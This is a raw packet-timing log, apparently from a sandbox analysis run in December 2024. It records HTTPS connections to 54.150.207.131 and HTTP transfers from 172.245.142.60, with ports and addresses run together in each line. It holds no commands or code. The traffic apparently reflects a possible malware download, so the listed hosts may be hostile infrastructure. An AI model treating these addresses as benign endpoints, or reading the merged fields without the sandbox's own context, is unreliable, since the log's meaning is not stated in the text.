                                                                                            Dec 10, 2024 06:57:41.914690018 CET4434916354.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:41.914757013 CET49163443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:41.941330910 CET49163443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:41.941344023 CET4434916354.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:43.522639990 CET4434916354.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:43.522737026 CET49163443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:43.528040886 CET49163443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:43.528050900 CET4434916354.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:43.528314114 CET4434916354.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:43.528369904 CET49163443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:43.596890926 CET49163443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:43.643328905 CET4434916354.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:44.249690056 CET4434916354.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:44.249747992 CET49163443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:44.249759912 CET4434916354.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:44.249794960 CET49163443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:44.250947952 CET49163443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:44.250971079 CET4434916354.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:44.256937981 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:44.376231909 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:44.376344919 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:44.376657963 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:44.496191025 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.530473948 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.530607939 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.530720949 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.530735016 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.530744076 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.530755997 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.530766964 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.530778885 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.530790091 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.530812979 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.530833006 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.530908108 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.530908108 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.530909061 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.530909061 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.530909061 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.530909061 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.650151968 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.650239944 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.650243998 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.650275946 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.654243946 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.654289961 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.654294968 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.654326916 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.723293066 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.723344088 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.723402023 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.727420092 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.727466106 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.727523088 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.735790014 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.735831022 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.735887051 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.744244099 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.744282007 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.744342089 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.752489090 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.752576113 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.752646923 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.761087894 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.761104107 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.761178970 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.769165993 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.769254923 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.769326925 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.777546883 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.777626991 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.777700901 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.785903931 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.786006927 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.786075115 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.794285059 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.794389963 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.794461966 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.801923037 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.801954031 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.802021027 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.809489012 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.809581041 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.809652090 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.915510893 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.915529013 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.915572882 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.917613029 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.917660952 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.917702913 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.917745113 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.922137976 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.922168970 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.922209978 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.922229052 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.926606894 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.926657915 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.926704884 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.926755905 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.931513071 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.931571007 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.931597948 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.931646109 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.935705900 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.935746908 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.935808897 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.935853004 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.940222025 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.940268040 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.940310955 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.940352917 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.944736004 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.944797993 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.944844007 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.944885969 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.949291945 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.949352026 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.949419975 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.949462891 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.953798056 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.953857899 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.953900099 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.953944921 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.958306074 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.958349943 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.958400011 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.958446980 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.962856054 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.962907076 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.962929010 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.962970972 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.967371941 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.967415094 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.967469931 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.967514038 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.971908092 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.971963882 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.972016096 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.972059011 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.976457119 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.976511955 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.976614952 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.976659060 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.981002092 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.981045961 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.981080055 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.981123924 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.985512018 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.985562086 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.985567093 CET8049164172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.985610008 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.987858057 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:45.987894058 CET4916480192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:46.634475946 CET49165443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:46.634547949 CET4434916554.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:46.634661913 CET49165443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:46.647146940 CET49165443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:46.647202969 CET4434916554.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:48.221975088 CET4434916554.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:48.222043991 CET49165443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:48.228241920 CET49165443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:48.228279114 CET4434916554.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:48.228524923 CET4434916554.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:48.228574991 CET49165443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:48.306405067 CET49165443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:48.347336054 CET4434916554.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:48.905425072 CET4434916554.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:48.905483007 CET4434916554.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:48.905662060 CET49165443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:48.905663013 CET49165443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:48.907073021 CET49165443192.168.2.2254.150.207.131
                                                                                            Dec 10, 2024 06:57:48.907095909 CET4434916554.150.207.131192.168.2.22
                                                                                            Dec 10, 2024 06:57:48.919837952 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:49.039042950 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:49.039118052 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:49.039467096 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:49.158693075 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.178848028 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.178972960 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.179073095 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.179089069 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.179096937 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.179102898 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.179107904 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.179114103 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.179193974 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.179219961 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.179231882 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.179244041 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.179267883 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.179277897 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.184976101 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.298675060 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.298718929 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.298763990 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.298783064 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.302592039 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.302644968 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.371293068 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.371337891 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.371346951 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.371390104 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.375382900 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.375423908 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.375511885 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.375550985 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.383754969 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.383807898 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.383837938 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.383877993 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.392096043 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.392162085 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.392194986 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.392229080 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.400484085 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.400544882 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.400650978 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.400692940 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.408827066 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.408890009 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.408935070 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.408973932 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.417190075 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.417258978 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.417303085 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.417341948 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.425483942 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.425544977 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.425585032 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.425625086 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.433830023 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.433926105 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.433960915 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.434000015 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.442205906 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.442282915 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.442318916 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.442368984 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.449892998 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.449953079 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.450021029 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.450061083 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.563476086 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.563488007 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.563559055 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.564743042 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.564798117 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.564862013 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.564905882 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.569509029 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.569575071 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.569598913 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.569638014 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.573160887 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.573215961 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.573277950 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.573318958 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.577899933 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.577958107 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.578003883 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.578042984 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.582629919 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.582681894 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.582736015 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.582776070 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.587385893 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.587440014 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.587481976 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.587518930 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.592135906 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.592189074 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.592259884 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.592297077 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.596885920 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.596931934 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.596997976 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.597042084 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.601624012 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.601679087 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.601722956 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.601762056 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.606331110 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.606383085 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.606424093 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.606458902 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.611057043 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.611119032 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.611160994 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.611206055 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.615801096 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.615866899 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.615902901 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.615946054 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.620543957 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.620605946 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.620646000 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.620685101 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.625272036 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.625319958 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.625371933 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.625410080 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.630065918 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.630116940 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.630116940 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.630158901 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.756136894 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.756314993 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.756412029 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.756412029 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.758202076 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.758249044 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.758311033 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.758363962 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.762406111 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.762455940 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.762515068 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.762554884 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.766586065 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.766632080 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.766710043 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.766752005 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.770806074 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.770854950 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.770915031 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.770956039 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.774992943 CET8049166172.245.142.60192.168.2.22
